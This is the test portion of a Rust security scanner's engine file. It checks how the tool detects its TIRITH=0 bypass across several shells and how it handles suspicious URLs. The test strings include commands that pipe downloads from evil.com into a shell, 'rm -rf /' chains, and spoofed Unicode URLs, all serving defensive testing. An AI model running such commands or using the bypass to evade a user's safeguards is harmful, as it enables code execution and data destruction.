1028        let timings = Timings {
1029            tier0_ms: 0.0,
1030            tier1_ms: 0.0,
1031            tier2_ms: None,
1032            tier3_ms: None,
1033            total_ms: 0.0,
1034        };
1035
1036        let mut verdict = Verdict::from_findings(findings.clone(), 3, timings.clone());
1037        filter_findings_by_paranoia(&mut verdict, 1);
1038        assert_eq!(
1039            verdict.findings.len(),
1040            1,
1041            "paranoia 1 should keep only Medium+"
1042        );
1043        assert_eq!(verdict.findings[0].severity, Severity::High);
1044
1045        let mut verdict = Verdict::from_findings(findings.clone(), 3, timings.clone());
1046        filter_findings_by_paranoia(&mut verdict, 2);
1047        assert_eq!(
1048            verdict.findings.len(),
1049            1,
1050            "paranoia 2 should keep only Medium+"
1051        );
1052    }
1053
1054    #[test]
1055    fn test_inline_bypass_bare_prefix() {
1056        assert!(find_inline_bypass(
1057            "TIRITH=0 curl evil.com",
1058            ShellType::Posix
1059        ));
1060    }
1061
1062    #[test]
1063    fn test_inline_bypass_env_wrapper() {
1064        assert!(find_inline_bypass(
1065            "env TIRITH=0 curl evil.com",
1066            ShellType::Posix
1067        ));
1068    }
1069
1070    #[test]
1071    fn test_inline_bypass_env_i() {
1072        assert!(find_inline_bypass(
1073            "env -i TIRITH=0 curl evil.com",
1074            ShellType::Posix
1075        ));
1076    }
1077
1078    #[test]
1079    fn test_inline_bypass_env_u_skip() {
1080        assert!(find_inline_bypass(
1081            "env -u TIRITH TIRITH=0 curl evil.com",
1082            ShellType::Posix
1083        ));
1084    }
1085
1086    #[test]
1087    fn test_inline_bypass_usr_bin_env() {
1088        assert!(find_inline_bypass(
1089            "/usr/bin/env TIRITH=0 curl evil.com",
1090            ShellType::Posix
1091        ));
1092    }
1093
1094    #[test]
1095    fn test_inline_bypass_env_dashdash() {
1096        assert!(find_inline_bypass(
1097            "env -- TIRITH=0 curl evil.com",
1098            ShellType::Posix
1099        ));
1100    }
1101
1102    #[test]
1103    fn test_no_inline_bypass() {
1104        assert!(!find_inline_bypass(
1105            "curl evil.com | bash",
1106            ShellType::Posix
1107        ));
1108    }
1109
1110    #[test]
1111    fn test_inline_bypass_powershell_env() {
1112        assert!(find_inline_bypass(
1113            "$env:TIRITH=\"0\"; curl evil.com",
1114            ShellType::PowerShell
1115        ));
1116    }
1117
1118    #[test]
1119    fn test_inline_bypass_powershell_env_no_quotes() {
1120        assert!(find_inline_bypass(
1121            "$env:TIRITH=0; curl evil.com",
1122            ShellType::PowerShell
1123        ));
1124    }
1125
1126    #[test]
1127    fn test_inline_bypass_powershell_env_single_quotes() {
1128        assert!(find_inline_bypass(
1129            "$env:TIRITH='0'; curl evil.com",
1130            ShellType::PowerShell
1131        ));
1132    }
1133
1134    #[test]
1135    fn test_inline_bypass_powershell_env_spaced() {
1136        assert!(find_inline_bypass(
1137            "$env:TIRITH = \"0\"; curl evil.com",
1138            ShellType::PowerShell
1139        ));
1140    }
1141
1142    #[test]
1143    fn test_inline_bypass_powershell_mixed_case_env() {
1144        assert!(find_inline_bypass(
1145            "$Env:TIRITH=\"0\"; curl evil.com",
1146            ShellType::PowerShell
1147        ));
1148    }
1149
1150    #[test]
1151    fn test_no_inline_bypass_powershell_wrong_value() {
1152        assert!(!find_inline_bypass(
1153            "$env:TIRITH=\"1\"; curl evil.com",
1154            ShellType::PowerShell
1155        ));
1156    }
1157
1158    #[test]
1159    fn test_no_inline_bypass_powershell_other_var() {
1160        assert!(!find_inline_bypass(
1161            "$env:FOO=\"0\"; curl evil.com",
1162            ShellType::PowerShell
1163        ));
1164    }
1165
1166    #[test]
1167    fn test_no_inline_bypass_powershell_in_posix_mode() {
1168        assert!(!find_inline_bypass(
1169            "$env:TIRITH=\"0\"; curl evil.com",
1170            ShellType::Posix
1171        ));
1172    }
1173
1174    #[test]
1175    fn test_no_inline_bypass_powershell_comment_contains_bypass() {
1176        assert!(!find_inline_bypass(
1177            "curl evil.com # $env:TIRITH=0",
1178            ShellType::PowerShell
1179        ));
1180    }
1181
1182    #[test]
1183    fn test_inline_bypass_env_c_flag() {
1184        // `env -C` takes a directory arg; TIRITH=0 after it must still register.
1185        assert!(find_inline_bypass(
1186            "env -C /tmp TIRITH=0 curl evil.com",
1187            ShellType::Posix
1188        ));
1189    }
1190
1191    #[test]
1192    fn test_inline_bypass_env_s_flag() {
1193        // `env -S` takes a string arg; TIRITH=0 after it must still register.
1194        assert!(find_inline_bypass(
1195            "env -S 'some args' TIRITH=0 curl evil.com",
1196            ShellType::Posix
1197        ));
1198    }
1199
1200    #[test]
1201    fn test_inline_bypass_env_ignore_environment_long_flag() {
1202        assert!(find_inline_bypass(
1203            "env --ignore-environment TIRITH=0 curl evil.com",
1204            ShellType::Posix
1205        ));
1206    }
1207
1208    // Pipe-bypass contract: `TIRITH=0 cmd | interp` is a documented
1209    // whole-pipeline bypass. Pipe stages share an env; sequencing operators
1210    // (`&&`, `||`, `;`, `&`) do not, so bypass must NOT carry across them.
1211
1212    #[test]
1213    fn test_inline_bypass_allows_pipe_to_sh() {
1214        assert!(find_inline_bypass(
1215            "TIRITH=0 curl -L https://something.xyz | bash",
1216            ShellType::Posix
1217        ));
1218    }
1219
1220    #[test]
1221    fn test_inline_bypass_allows_pipe_to_interpreter() {
1222        assert!(find_inline_bypass(
1223            "TIRITH=0 curl -sSL https://install.python-poetry.org | python3 -",
1224            ShellType::Posix
1225        ));
1226    }
1227
1228    #[test]
1229    fn test_inline_bypass_allows_env_wrapper_with_pipe() {
1230        assert!(find_inline_bypass(
1231            "env TIRITH=0 curl https://example.com | bash",
1232            ShellType::Posix
1233        ));
1234    }
1235
1236    #[test]
1237    fn test_inline_bypass_allows_multi_pipe_chain() {
1238        assert!(find_inline_bypass(
1239            "TIRITH=0 curl https://example.com | jq . | bash",
1240            ShellType::Posix
1241        ));
1242    }
1243
1244    #[test]
1245    fn test_inline_bypass_rejects_sequence_with_and_and() {
1246        // `&&` starts a new command with a new env — bypass must NOT apply.
1247        assert!(!find_inline_bypass(
1248            "TIRITH=0 curl https://example.com && rm -rf /",
1249            ShellType::Posix
1250        ));
1251    }
1252
1253    #[test]
1254    fn test_inline_bypass_rejects_semicolon_chain() {
1255        assert!(!find_inline_bypass(
1256            "TIRITH=0 ls ; rm -rf /",
1257            ShellType::Posix
1258        ));
1259    }
1260
1261    #[test]
1262    fn test_inline_bypass_rejects_or_or() {
1263        assert!(!find_inline_bypass(
1264            "TIRITH=0 ls || rm -rf /",
1265            ShellType::Posix
1266        ));
1267    }
1268
1269    #[test]
1270    fn test_inline_bypass_rejects_backgrounding_ampersand() {
1271        // Unquoted `&` forks a background command; bypass must not cover the
1272        // foreground successor.
1273        assert!(!find_inline_bypass(
1274            "TIRITH=0 curl evil.com & bash",
1275            ShellType::Posix
1276        ));
1277    }
1278
1279    #[test]
1280    fn test_inline_bypass_allows_pipe_to_sh_fish() {
1281        // Fish tokenization delegates to POSIX; same pipe-bypass contract applies.
1282        assert!(find_inline_bypass(
1283            "TIRITH=0 curl -L https://example.com | bash",
1284            ShellType::Fish
1285        ));
1286    }
1287
1288    #[test]
1289    fn test_paranoia_filter_recalculates_action() {
1290        use crate::verdict::{Action, Finding, RuleId, Severity, Timings, Verdict};
1291
1292        let findings = vec![
1293            Finding {
1294                rule_id: RuleId::InvisibleWhitespace,
1295                severity: Severity::Low,
1296                title: "low finding".into(),
1297                description: String::new(),
1298                evidence: vec![],
1299                human_view: None,
1300                agent_view: None,
1301                mitre_id: None,
1302                custom_rule_id: None,
1303            },
1304            Finding {
1305                rule_id: RuleId::HiddenCssContent,
1306                severity: Severity::Medium,
1307                title: "medium finding".into(),
1308                description: String::new(),
1309                evidence: vec![],
1310                human_view: None,
1311                agent_view: None,
1312                mitre_id: None,
1313                custom_rule_id: None,
1314            },
1315        ];
1316
1317        let timings = Timings {
1318            tier0_ms: 0.0,
1319            tier1_ms: 0.0,
1320            tier2_ms: None,
1321            tier3_ms: None,
1322            total_ms: 0.0,
1323        };
1324
1325        let mut verdict = Verdict::from_findings(findings, 3, timings);
1326        assert_eq!(verdict.action, Action::Warn);
1327
1328        // After paranoia 1: the Low finding is dropped; only the Medium
1329        // remains so the action stays Warn.
1330        filter_findings_by_paranoia(&mut verdict, 1);
1331        assert_eq!(verdict.action, Action::Warn);
1332        assert_eq!(verdict.findings.len(), 1);
1333    }
1334
1335    #[test]
1336    fn test_powershell_bypass_case_insensitive_tirith() {
1337        // PowerShell env vars are case-insensitive.
1338        assert!(find_inline_bypass(
1339            "$env:tirith=\"0\"; curl evil.com",
1340            ShellType::PowerShell
1341        ));
1342        assert!(find_inline_bypass(
1343            "$ENV:Tirith=\"0\"; curl evil.com",
1344            ShellType::PowerShell
1345        ));
1346    }
1347
1348    #[test]
1349    fn test_powershell_bypass_no_panic_on_multibyte() {
1350        // Guards against byte-level slicing on multi-byte UTF-8 after `$`.
1351        assert!(!find_inline_bypass(
1352            "$a\u{1F389}xyz; curl evil.com",
1353            ShellType::PowerShell
1354        ));
1355        assert!(!find_inline_bypass(
1356            "$\u{00E9}nv:TIRITH=0; curl evil.com",
1357            ShellType::PowerShell
1358        ));
1359    }
1360
1361    #[test]
1362    fn test_inline_bypass_single_quoted_value() {
1363        assert!(find_inline_bypass(
1364            "TIRITH='0' curl evil.com",
1365            ShellType::Posix
1366        ));
1367    }
1368
1369    #[test]
1370    fn test_inline_bypass_double_quoted_value() {
1371        assert!(find_inline_bypass(
1372            "TIRITH=\"0\" curl evil.com",
1373            ShellType::Posix
1374        ));
1375    }
1376
1377    // Tirith inspection subcommands (`tirith diff/score/why/receipt/explain`)
1378    // must not trip URL or Unicode-style rules on their own arguments — the
1379    // user typed those arguments specifically to have them inspected.
1380    // `tirith run` and other subcommands stay on the regular analysis path.
1381
1382    #[test]
1383    fn test_tirith_run_still_acts_as_sink() {
1384        // `tirith run` IS a sink; URL-to-sink rules must still fire.
1385        let ctx = exec_ctx("tirith run http://example.com");
1386        let verdict = analyze(&ctx);
1387        assert!(verdict.tier_reached >= 3);
1388        assert!(
1389            verdict
1390                .findings
1391                .iter()
1392                .any(|f| matches!(f.rule_id, crate::verdict::RuleId::PlainHttpToSink)),
1393            "tirith run http://... should surface sink findings"
1394        );
1395    }
1396
1397    fn exec_ctx(input: &str) -> AnalysisContext {
1398        AnalysisContext {
1399            input: input.to_string(),
1400            shell: ShellType::Posix,
1401            scan_context: ScanContext::Exec,
1402            raw_bytes: None,
1403            interactive: true,
1404            cwd: None,
1405            file_path: None,
1406            repo_root: None,
1407            is_config_override: false,
1408            clipboard_html: None,
1409        }
1410    }
1411
1412    #[test]
1413    fn test_tirith_inspection_suppresses_url_rules() {
1414        // Cyrillic 'а' inside a URL arg must NOT trip URL-derived findings
1415        // (non_ascii_hostname, mixed_script_in_label, punycode_domain) when
1416        // passed to an inspection subcommand.
1417        for sub in ["diff", "score", "why", "receipt", "explain"] {
1418            let input = format!("tirith {sub} https://ex\u{0430}mple.com");
1419            let verdict = analyze(&exec_ctx(&input));
1420            assert!(
1421                verdict.action == crate::verdict::Action::Allow,
1422                "tirith {sub} with cyrillic URL should allow, got {:?}: {:?}",
1423                verdict.action,
1424                verdict
1425                    .findings
1426                    .iter()
1427                    .map(|f| f.rule_id.to_string())
1428                    .collect::<Vec<_>>()
1429            );
1430        }
1431    }
1432
1433    #[test]
1434    fn test_tirith_inspection_suppresses_confusable_and_bidi() {
1435        // The exec-context byte scan must also respect the inert range so
1436        // ConfusableText / BidiControls / etc. aren't emitted for bytes inside
1437        // the inspection arg span.
1438        let input = "tirith score https://ex\u{0430}mple.com/\u{202E}bar";
1439        let verdict = analyze(&exec_ctx(input));
1440        for f in &verdict.findings {
1441            assert!(
1442                !matches!(
1443                    f.rule_id,
1444                    crate::verdict::RuleId::ConfusableText | crate::verdict::RuleId::BidiControls
1445                ),
1446                "tirith score arg span must not surface {:?}",
1447                f.rule_id
1448            );
1449        }
1450    }
1451
1452    #[test]
1453    fn test_tirith_inspection_with_pipe_still_analyzes_rest() {
1454        // Later pipeline segments must still be analyzed normally.
1455        let ctx = exec_ctx("tirith diff foo | curl http://evil.com/x.sh | sh");
1456        let verdict = analyze(&ctx);
1457        assert!(
1458            verdict
1459                .findings
1460                .iter()
1461                .any(|f| matches!(f.rule_id, crate::verdict::RuleId::PlainHttpToSink)),
1462            "later pipe segments must still fire plain_http_to_sink"
1463        );
1464    }
1465
1466    #[test]
1467    fn test_tirith_inspection_with_leading_flag() {
1468        // A flag before the subcommand must not defeat the carveout.
1469        let input = "tirith --quiet diff https://ex\u{0430}mple.com";
1470        let verdict = analyze(&exec_ctx(input));
1471        assert_eq!(verdict.action, crate::verdict::Action::Allow);
1472    }
1473
1474    #[test]
1475    fn test_tirith_doctor_not_on_inert_list() {
1476        // `doctor` is deliberately NOT on the inspection list. Adding any new
1477        // subcommand requires a motivating false-positive fixture.
1478        let input = "tirith doctor https://ex\u{0430}mple.com";
1479        let verdict = analyze(&exec_ctx(input));
1480        assert_ne!(
1481            verdict.action,
1482            crate::verdict::Action::Allow,
1483            "tirith doctor with cyrillic URL SHOULD still flag (not on inert list); \
1484             adding `doctor` to the list requires a motivating false-positive fixture"
1485        );
1486    }
1487
1488    #[test]
1489    fn test_tirith_run_bidi_in_url_still_fires() {
1490        // `tirith run` is a sink (not on the inspection list); bidi in its URL
1491        // arg must still fire.
1492        let input = "tirith run https://evil\u{202E}.com/x.sh";
1493        let verdict = analyze(&exec_ctx(input));
1494        assert!(
1495            verdict
1496                .findings
1497                .iter()
1498                .any(|f| matches!(f.rule_id, crate::verdict::RuleId::BidiControls)),
1499            "bidi in `tirith run` URL must still fire"
1500        );
1501    }
1502
1503    #[test]
1504    fn test_tirith_inert_arg_range_covers_expected_span() {
1505        let input = "tirith diff https://ex\u{0430}mple.com";
1506        let range = extract::tirith_inert_arg_range(input, ShellType::Posix).unwrap();
1507        // "tirith diff" is 11 bytes; arg span starts at byte 11 and runs to end.
1508        assert_eq!(&input[range.clone()], " https://ex\u{0430}mple.com");
1509        assert_eq!(range.end, input.len());
1510    }
1511
1512    #[test]
1513    fn test_tirith_inert_arg_range_none_for_run() {
1514        let range =
1515            extract::tirith_inert_arg_range("tirith run http://example.com", ShellType::Posix);
1516        assert!(range.is_none());
1517    }
1518
1519    #[test]
1520    fn test_tirith_inert_arg_range_none_for_non_tirith() {
1521        assert!(
1522            extract::tirith_inert_arg_range("curl https://example.com", ShellType::Posix).is_none()
1523        );
1524    }
1525
1526    #[test]
1527    fn test_tirith_inert_arg_range_pipe_only_first_segment() {
1528        // Only the first segment is inert; later pipe stages must still analyze.
1529        let input = "tirith diff foo | curl http://evil.com";
1530        let range = extract::tirith_inert_arg_range(input, ShellType::Posix).unwrap();
1531        assert!(range.end < input.len());
1532        assert!(!input[range.clone()].contains("curl"));
1533    }
1534
1535    #[test]
1536    fn test_tirith_inspection_suppresses_unicode_tags_evidence_text() {
1537        // UnicodeTags emits Evidence::Text (no byte offset), so an offset-only
1538        // post-filter would leak it. The inert range must therefore be applied
1539        // AT SCAN TIME (inside check_bytes_with_ignore).
1540        let input = "tirith diff https://example.com/\u{E0041}";
1541        let verdict = analyze(&exec_ctx(input));
1542        assert!(
1543            !verdict
1544                .findings
1545                .iter()
1546                .any(|f| matches!(f.rule_id, crate::verdict::RuleId::UnicodeTags)),
1547            "UnicodeTags inside tirith diff arg must be suppressed, got findings: {:?}",
1548            verdict
1549                .findings
1550                .iter()
1551                .map(|f| f.rule_id.to_string())
1552                .collect::<Vec<_>>()
1553        );
1554    }
1555
1556    #[test]
1557    fn test_tirith_inspection_unicode_tags_outside_still_fires() {
1558        // A unicode-tag byte before `tirith diff` is outside the inert range
1559        // and must still fire.
1560        let input = "FOO=\u{E0041}\u{E0042} tirith diff safe";
1561        let verdict = analyze(&exec_ctx(input));
1562        assert!(
1563            verdict
1564                .findings
1565                .iter()
1566                .any(|f| matches!(f.rule_id, crate::verdict::RuleId::UnicodeTags)),
1567            "UnicodeTags before tirith diff must still fire, got findings: {:?}",
1568            verdict
1569                .findings
1570                .iter()
1571                .map(|f| f.rule_id.to_string())
1572                .collect::<Vec<_>>()
1573        );
1574    }
1575
1576    #[test]
1577    fn test_tirith_inspection_with_sudo_wrapper() {
1578        // `sudo tirith diff URL` — the resolver must see through the sudo
1579        // wrapper to recognize the inspection subcommand.
1580        let input = "sudo tirith diff https://ex\u{0430}mple.com";
1581        let verdict = analyze(&exec_ctx(input));
1582        assert_eq!(
1583            verdict.action,
1584            crate::verdict::Action::Allow,
1585            "sudo tirith diff <cyrillic-url> must be allowed, got {:?}: {:?}",
1586            verdict.action,
1587            verdict
1588                .findings
1589                .iter()
1590                .map(|f| f.rule_id.to_string())
1591                .collect::<Vec<_>>()
1592        );
1593    }
1594
1595    #[test]
1596    fn test_tirith_inspection_with_sudo_u_flag() {
1597        // `sudo -u root` — -u takes a value; the resolver must skip past it.
1598        let input = "sudo -u root tirith diff https://ex\u{0430}mple.com";
1599        let verdict = analyze(&exec_ctx(input));
1600        assert_eq!(verdict.action, crate::verdict::Action::Allow);
1601    }
1602
1603    #[test]
1604    fn test_tirith_inspection_env_assignment_url_still_analyzed() {
1605        // A URL in a leading `FOO=URL` env assignment is OUTSIDE the inspection
1606        // arg span and must still be analyzed.
1607        let input = "FOO=http://evil.com tirith diff safe";
1608        let verdict = analyze(&exec_ctx(input));
1609        // Exact rule behavior for schemeless URLs belongs in the rules layer;
1610        // this test just checks the URL reached the extractor at all.
1611        let urls = verdict.urls_extracted_count.unwrap_or(0);
1612        assert!(
1613            !verdict.findings.is_empty() || urls > 0,
1614            "env-assignment URL must still be extracted/analyzed, got {:?}",
1615            verdict
1616        );
1617    }
1618
1619    #[test]
1620    fn test_tirith_inspection_with_sudo_dash_s_boolean_flag() {
1621        // `-S` is a BOOLEAN sudo flag (read password from stdin). Treating it
1622        // as value-taking would skip `tirith` and resolve `diff` as the
1623        // command word, breaking the carveout.
1624        let input = "sudo -S tirith diff https://ex\u{0430}mple.com";
1625        let verdict = analyze(&exec_ctx(input));
1626        assert_eq!(
1627            verdict.action,
1628            crate::verdict::Action::Allow,
1629            "sudo -S tirith diff must still allow; got {:?}: {:?}",
1630            verdict.action,
1631            verdict
1632                .findings
1633                .iter()
1634                .map(|f| f.rule_id.to_string())
1635                .collect::<Vec<_>>()
1636        );
1637    }
1638
1639    #[test]
1640    fn test_tirith_inspection_with_sudo_dash_a_boolean_flag() {
1641        // Same boolean-flag class as `-S`, for `-A` (askpass).
1642        let input = "sudo -A tirith diff https://ex\u{0430}mple.com";
1643        let verdict = analyze(&exec_ctx(input));
1644        assert_eq!(verdict.action, crate::verdict::Action::Allow);
1645    }
1646
1647    #[test]
1648    fn test_tirith_inspection_with_sudo_dash_b_boolean_flag() {
1649        // Same boolean-flag class as `-S`, for `-B` (ring bell).
1650        let input = "sudo -B tirith diff https://ex\u{0430}mple.com";
1651        let verdict = analyze(&exec_ctx(input));
1652        assert_eq!(verdict.action, crate::verdict::Action::Allow);
1653    }
1654
1655    #[test]
1656    fn test_tirith_inspection_with_doas_wrapper() {
1657        // `doas` is an OpenBSD-flavored sudo alias; same resolver branch.
1658        let input = "doas tirith diff https://ex\u{0430}mple.com";
1659        let verdict = analyze(&exec_ctx(input));
1660        assert_eq!(verdict.action, crate::verdict::Action::Allow);
1661    }
1662
1663    #[test]
1664    fn test_tirith_inert_arg_range_no_false_match_inside_flag_value() {
1665        // A naive substring search would match "diff" inside `--config=diff`.
1666        // The subcommand lookup must require a whitespace word boundary.
1667        let input = "tirith --config=diff diff https://example.com";
1668        let range = extract::tirith_inert_arg_range(input, ShellType::Posix).unwrap();
1669        let inert_slice = &input[range.clone()];
1670        assert!(
1671            inert_slice.contains("https://example.com"),
1672            "inert range should cover the URL, got: {inert_slice:?}"
1673        );
1674        assert!(
1675            !inert_slice.contains("diff diff"),
1676            "inert range should not start inside the flag value: {inert_slice:?}"
1677        );
1678    }
1679
1680    #[test]
1681    fn test_cmd_bypass_bare_set() {
1682        assert!(find_inline_bypass(
1683            "set TIRITH=0 & curl evil.com",
1684            ShellType::Cmd
1685        ));
1686    }
1687
1688    #[test]
1689    fn test_cmd_bypass_whole_token_quoted() {
1690        // Whole-token quoting IS a real bypass — the quotes surround the whole
1691        // `TIRITH=0` assignment.
1692        assert!(find_inline_bypass(
1693            "set \"TIRITH=0\" & curl evil.com",
1694            ShellType::Cmd
1695        ));
1696    }
1697
1698    #[test]
1699    fn test_cmd_no_bypass_inner_double_quotes() {
1700        // cmd.exe stores literal `"0"` (quotes included), so `set TIRITH="0"`
1701        // does NOT bypass.
1702        assert!(!find_inline_bypass(
1703            "set TIRITH=\"0\" & curl evil.com",
1704            ShellType::Cmd
1705        ));
1706    }
1707
1708    #[test]
1709    fn test_cmd_no_bypass_single_quotes() {
1710        // Single quotes are literal in cmd.exe (not syntax), so the value is
1711        // `'0'`, not `0`.
1712        assert!(!find_inline_bypass(
1713            "set TIRITH='0' & curl evil.com",
1714            ShellType::Cmd
1715        ));
1716    }
1717
1718    #[test]
1719    fn test_cmd_no_bypass_wrong_value() {
1720        assert!(!find_inline_bypass(
1721            "set TIRITH=1 & curl evil.com",
1722            ShellType::Cmd
1723        ));
1724    }
1725}
tirith_core/engine.rs

tirith_core/
engine.rs